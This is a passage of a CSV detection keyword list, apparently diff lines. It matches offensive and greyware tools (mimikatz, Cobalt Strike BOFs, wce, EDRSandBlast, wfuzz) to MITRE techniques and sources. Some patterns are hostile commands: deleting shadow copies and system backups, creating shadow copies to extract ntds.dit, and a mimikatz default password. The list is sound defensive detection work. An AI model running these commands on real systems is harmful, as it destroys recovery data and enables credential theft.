+"*volatility2 --profile=*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*volatility3 -f *.dmp*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*VPNPivot*","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ...
etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","256","52","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z"
+"*vRealizeLogInsightRCE*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z"
+"*vsf_sysutil_read_loop*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","1","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
+"*vssadmin create shadow /for=C:*","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vssadmin create shadow /for=C:* \Temp\*.tmp*","greyware_tool_keyword","vssadmin","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from
it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vssadmin list shadows*","greyware_tool_keyword","vssadmin","List shadow copies using vssadmin","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vssadmin* Delete Shadows /All /Quiet*","greyware_tool_keyword","vssadmin","Deletes all Volume Shadow Copies from the system quietly (without prompts).","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera -
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z"
+"*vssenum.x86.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z"
+"*vtiger_crm_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework.
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*vulfocus/spring-core-rce-*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z"
+"*vulmon*Vulmap*","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability scanner","https://github.com/vulmon/Vulmap","1","1","N/A","N/A","9","888","196","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z"
+"*Vulnerabilities/RPCDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*vulnfactory.org/exploits/*.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*vulns/apache.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*vulns/iis.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*vulns/jrun.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*vulns/tomcat.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*vulnweb.com/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*vulny-code-static-analysis --dir *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*vu-ls/Crassus*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z"
+"*vyrus001/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z"
+"*vysecurity*","offensive_tool_keyword","Github Username","github username hosting red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/vysecurity","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vysecurity/ANGRYPUPPY*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 -
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
+"*-w *wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z"
+"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
+"*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced
C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*w3af_gui*","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework.
The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*WAF-bypass-Cheat-Sheet*","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","408","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z"
+"*wafw00f https://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful.
it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4472","883","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" +"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*warberry*","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2209","307","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" +"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*wavestone-cdt/EDRSandblast*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*wavvs/nanorobeus*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*WazeHell/sam-the-admin*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" +"*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*","greyware_tool_keyword","wbadmin","Wbadmin allows 
administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wbadmin DELETE SYSTEMSTATEBACKUP*","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. 
adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wce -i 3e5 -s *","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce*getlsasrvaddr.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce-master.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wce-universal.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*wcfrelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
